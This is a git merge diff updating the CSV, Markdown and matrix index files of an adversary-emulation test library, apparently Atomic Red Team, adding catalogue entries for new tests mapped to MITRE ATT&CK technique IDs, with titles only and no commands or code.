Merge branch 'master' into patch-7

atomics/Indexes/Indexes-CSV/index.csv

@@ -262,6 +262,7 @@ defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Mov
 defense-evasion,T1218.005,Mshta,10,Mshta used to Execute PowerShell,8707a805-2b76-4f32-b1c0-14e558205772,command_prompt
 defense-evasion,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
 defense-evasion,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
+defense-evasion,T1134.001,Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
 defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh
 defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
 defense-evasion,T1564.002,Hidden Users,3,Create Hidden User in Registry,173126b7-afe4-45eb-8680-fa9f6400431c,command_prompt
@@ -520,6 +521,7 @@ privilege-escalation,T1546.009,AppCert DLLs,1,Create registry persistence via Ap
 privilege-escalation,T1547.015,Login Items,1,Persistence by modifying Windows Terminal profile,ec5d76ef-82fe-48da-b931-bdb25a62bc65,powershell
 privilege-escalation,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
 privilege-escalation,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
+privilege-escalation,T1134.001,Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
 privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription - CommandLineEventConsumer,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
 privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,2,Persistence via WMI Event Subscription - ActiveScriptEventConsumer,fecd0dfd-fb55-45fa-a10b-6250272d0832,powershell
 privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,3,Windows MOFComp.exe Load MOF File,29786d7e-8916-4de6-9c55-be7b093b2706,powershell
@@ -942,6 +944,7 @@ credential-access,T1555,Credentials from Password Stores,5,Enumerate credentials
 credential-access,T1555,Credentials from Password Stores,6,WinPwn - Loot local Credentials - lazagne,079ee2e9-6f16-47ca-a635-14efcd994118,powershell
 credential-access,T1555,Credentials from Password Stores,7,WinPwn - Loot local Credentials - Wifi Credentials,afe369c2-b42e-447f-98a3-fb1f4e2b8552,powershell
 credential-access,T1555,Credentials from Password Stores,8,WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords,db965264-3117-4bad-b7b7-2523b7856b92,powershell
+credential-access,T1552,Unsecured Credentials,1,AWS - Retrieve EC2 Password Data using stratus,a21118de-b11e-4ebd-b655-42f11142df0c,sh
 credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
 credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
 credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
@@ -1288,9 +1291,11 @@ command-and-control,T1105,Ingress Tool Transfer,24,Lolbas replace.exe use to cop
 command-and-control,T1105,Ingress Tool Transfer,25,certreq download,6fdaae87-c05b-42f8-842e-991a74e8376b,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,26,Download a file using wscript,97116a3f-efac-4b26-8336-b9cb18c45188,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,27,Linux Download File and Run,bdc373c5-e9cf-4563-8a7b-a9ba720a90f3,sh
+command-and-control,T1105,Ingress Tool Transfer,28,Nimgrab - Transfer Files,b1729c57-9384-4d1c-9b99-9b220afb384e,command_prompt
 command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
 command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
 command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
+reconnaissance,T1592.002,Software,1,Enumerate COM Objects with Powershell,0d80d088-a84c-4353-af1a-fc8b439f1564,powershell
 impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt
 impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt
 impact,T1489,Service Stop,3,Windows - Stop service by killing process,f3191b84-c38b-400b-867e-3a217a27795f,command_prompt

atomics/Indexes/Indexes-CSV/linux-index.csv

@@ -199,6 +199,7 @@ credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory wit
 credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
 credential-access,T1003.007,Proc Filesystem,3,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash
 credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
+credential-access,T1552,Unsecured Credentials,1,AWS - Retrieve EC2 Password Data using stratus,a21118de-b11e-4ebd-b655-42f11142df0c,sh
 credential-access,T1555.003,Credentials from Web Browsers,9,LaZagne.py - Dump Credentials from Firefox Browser,87e88698-621b-4c45-8a89-4eaebdeaabb1,sh
 credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
 credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh

atomics/Indexes/Indexes-CSV/macos-index.csv

@@ -120,6 +120,7 @@ privilege-escalation,T1078.003,Local Accounts,2,Create local account with admin
 credential-access,T1056.001,Keylogging,7,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
 credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
 credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
+credential-access,T1552,Unsecured Credentials,1,AWS - Retrieve EC2 Password Data using stratus,a21118de-b11e-4ebd-b655-42f11142df0c,sh
 credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
 credential-access,T1555.003,Credentials from Web Browsers,14,Simulating Access to Chrome Login Data - MacOS,124e13e5-d8a1-4378-a6ee-a53cd0c7e369,sh
 credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -196,6 +196,7 @@ defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Mov
 defense-evasion,T1218.005,Mshta,10,Mshta used to Execute PowerShell,8707a805-2b76-4f32-b1c0-14e558205772,command_prompt
 defense-evasion,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
 defense-evasion,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
+defense-evasion,T1134.001,Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
 defense-evasion,T1564.002,Hidden Users,3,Create Hidden User in Registry,173126b7-afe4-45eb-8680-fa9f6400431c,command_prompt
 defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
 defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
@@ -383,6 +384,7 @@ privilege-escalation,T1055.004,Asynchronous Procedure Call,1,Process Injection v
 privilege-escalation,T1546.009,AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
 privilege-escalation,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
 privilege-escalation,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
+privilege-escalation,T1134.001,Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
 privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription - CommandLineEventConsumer,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
 privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,2,Persistence via WMI Event Subscription - ActiveScriptEventConsumer,fecd0dfd-fb55-45fa-a10b-6250272d0832,powershell
 privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,3,Windows MOFComp.exe Load MOF File,29786d7e-8916-4de6-9c55-be7b093b2706,powershell
@@ -929,6 +931,7 @@ command-and-control,T1105,Ingress Tool Transfer,23,Lolbas replace.exe use to cop
 command-and-control,T1105,Ingress Tool Transfer,24,Lolbas replace.exe use to copy UNC file,ed0335ac-0354-400c-8148-f6151d20035a,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,25,certreq download,6fdaae87-c05b-42f8-842e-991a74e8376b,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,26,Download a file using wscript,97116a3f-efac-4b26-8336-b9cb18c45188,command_prompt
+command-and-control,T1105,Ingress Tool Transfer,28,Nimgrab - Transfer Files,b1729c57-9384-4d1c-9b99-9b220afb384e,command_prompt
 command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
 impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt
 impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt

atomics/Indexes/Indexes-Markdown/index.md

@@ -382,6 +382,7 @@
 - [T1134.001 Token Impersonation/Theft](../../T1134.001/T1134.001.md)
   - Atomic Test #1: Named pipe client impersonation [windows]
   - Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
+  - Atomic Test #3: Launch NSudo Executable [windows]
 - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1564.002 Hidden Users](../../T1564.002/T1564.002.md)
   - Atomic Test #1: Create Hidden User using UniqueID < 500 [macos]
@@ -805,6 +806,7 @@
 - [T1134.001 Token Impersonation/Theft](../../T1134.001/T1134.001.md)
   - Atomic Test #1: Named pipe client impersonation [windows]
   - Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
+  - Atomic Test #3: Launch NSudo Executable [windows]
 - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1053.004 Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.003 Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
@@ -1609,7 +1611,8 @@
   - Atomic Test #6: WinPwn - Loot local Credentials - lazagne [windows]
   - Atomic Test #7: WinPwn - Loot local Credentials - Wifi Credentials [windows]
   - Atomic Test #8: WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords [windows]
-- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1552 Unsecured Credentials](../../T1552/T1552.md)
+  - Atomic Test #1: AWS - Retrieve EC2 Password Data using stratus [linux, macos]
 - T1139 Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1145 Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -2130,6 +2133,7 @@
   - Atomic Test #25: certreq download [windows]
   - Atomic Test #26: Download a file using wscript [windows]
   - Atomic Test #27: Linux Download File and Run [linux]
+  - Atomic Test #28: Nimgrab - Transfer Files [windows]
 - T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
@@ -2173,7 +2177,8 @@
 - T1593 Search Open Websites/Domains [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1597 Search Closed Sources [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1592.003 Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1592.002 Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1592.002 Software](../../T1592.002/T1592.002.md)
+  - Atomic Test #1: Enumerate COM Objects with Powershell [windows]
 - T1593.001 Social Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1589.001 Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1595.003 Wordlist Scanning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/linux-index.md

@@ -495,7 +495,8 @@
   - Atomic Test #1: Packet Capture Linux [linux]
 - T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1552 Unsecured Credentials](../../T1552/T1552.md)
+  - Atomic Test #1: AWS - Retrieve EC2 Password Data using stratus [linux, macos]
 - T1139 Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1145 Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/macos-index.md

@@ -384,7 +384,8 @@
   - Atomic Test #2: Packet Capture macOS [macos]
 - T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1552 Unsecured Credentials](../../T1552/T1552.md)
+  - Atomic Test #1: AWS - Retrieve EC2 Password Data using stratus [linux, macos]
 - T1139 Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1145 Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -290,6 +290,7 @@
 - [T1134.001 Token Impersonation/Theft](../../T1134.001/T1134.001.md)
   - Atomic Test #1: Named pipe client impersonation [windows]
   - Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
+  - Atomic Test #3: Launch NSudo Executable [windows]
 - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1564.002 Hidden Users](../../T1564.002/T1564.002.md)
   - Atomic Test #3: Create Hidden User in Registry [windows]
@@ -602,6 +603,7 @@
 - [T1134.001 Token Impersonation/Theft](../../T1134.001/T1134.001.md)
   - Atomic Test #1: Named pipe client impersonation [windows]
   - Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
+  - Atomic Test #3: Launch NSudo Executable [windows]
 - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.003 Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
   - Atomic Test #1: Persistence via WMI Event Subscription - CommandLineEventConsumer [windows]
@@ -1541,6 +1543,7 @@
   - Atomic Test #24: Lolbas replace.exe use to copy UNC file [windows]
   - Atomic Test #25: certreq download [windows]
   - Atomic Test #26: Download a file using wscript [windows]
+  - Atomic Test #28: Nimgrab - Transfer Files [windows]
 - T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)

atomics/Indexes/Matrices/linux-matrix.md

@@ -17,7 +17,7 @@
 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Office Application Startup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Trap](../../T1546.005/T1546.005.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [System Information Discovery](../../T1082/T1082.md) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Cloud Storage Object](../../T1530/T1530.md) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Systemd Timers](../../T1053.006/T1053.006.md) | Add-ins [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unix Shell](../../T1059.004/T1059.004.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [System Checks](../../T1497.001/T1497.001.md) | Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Access Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Cloud Accounts](../../T1078.004/T1078.004.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) |  | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Unencrypted Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
 | Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sudo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |

atomics/Indexes/Matrices/macos-matrix.md

@@ -15,7 +15,7 @@
 | Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Launchctl](../../T1569.001/T1569.001.md) | [Cron](../../T1053.003/T1053.003.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | [Network Sniffing](../../T1040/T1040.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Login Hook](../../T1037.002/T1037.002.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) |  | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
